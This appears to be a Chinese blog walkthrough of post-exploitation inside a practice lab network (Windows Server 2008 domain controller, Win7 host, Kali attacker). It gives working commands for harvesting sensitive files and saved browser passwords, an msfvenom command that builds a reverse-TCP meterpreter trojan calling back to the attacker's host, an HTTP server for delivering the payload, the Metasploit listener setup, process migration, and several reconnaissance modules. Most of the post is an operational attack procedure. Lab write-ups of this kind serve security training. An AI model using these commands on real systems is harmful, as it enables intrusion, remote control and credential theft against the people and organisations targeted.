内网信息收集——MSF信息收集&浏览器记录&配置文件敏感信息


域控:windows server 2008
域内机器:win7
攻击机:kali

就是红日靶场(一)的虚拟机。

一、配置文件敏感信息收集

使用searchall64.exe,下图在win7上用的是3.5.6,3.5.9用不了,会报错。

searchall64.exe -p c:// # 收集C盘下的敏感信息

在这里插入图片描述

二、浏览器密码&记录

使用hack-browser-data-windows-64bit.exe,同样这里是在win7上运行,v0.4.3可用,v0.4.5用不了。
在这里插入图片描述

三、MSF信息收集

1、生成反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.92.6 LPORT=4444 -f exe -o reverse_shell.exe

在这里插入图片描述

2、kali开启http服务,win7下载反弹shell

python3 -m http.server 9999

3、kali开始监听(使用msf)

msfconsole                                         # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler                          # 监听木马反弹过来的shell
msset payload windows/x64/meterpreter/reverse_tcp  	   # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set lhost 192.168.92.6                          # 我们的kali本机ip
set lport 4444                                    # 我们的kali本机端口
exploit                                            # 开始进行监听;

在这里插入图片描述
在win7上运行反弹shelltest.exe,即可获取win7的shell。
在这里插入图片描述
注入到新的进程

getpid # 获取当前进程PID
ps # 查看系统进程
migrate -P <pid> # 迁移到相应pid的进程中

进入受害机shell

shell # 进入shell
chcp 65001 # 修改编码,解决控制台乱码问题

在这里插入图片描述

获取目标机器的分区信息

run post/windows/gather/forensics/enum_drives #获取目标机器的分区信息

在这里插入图片描述

判断是否是虚拟机:

run post/windows/gather/checkvm # 判断是否是虚拟机

在这里插入图片描述

开启了什么服务:

run post/windows/gather/enum_services # 开启了什么服务

在这里插入图片描述

安装了什么应用

run post/windows/gather/enum_applications # 安装了什么应用

在这里插入图片描述

获取主机最近的系统操作

post/windows/gather/dumplinks # 获取主机最近的系统操作

在这里插入图片描述

查看补丁

run post/windows/gather/enum_patches #查看补丁

在这里插入图片描述

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值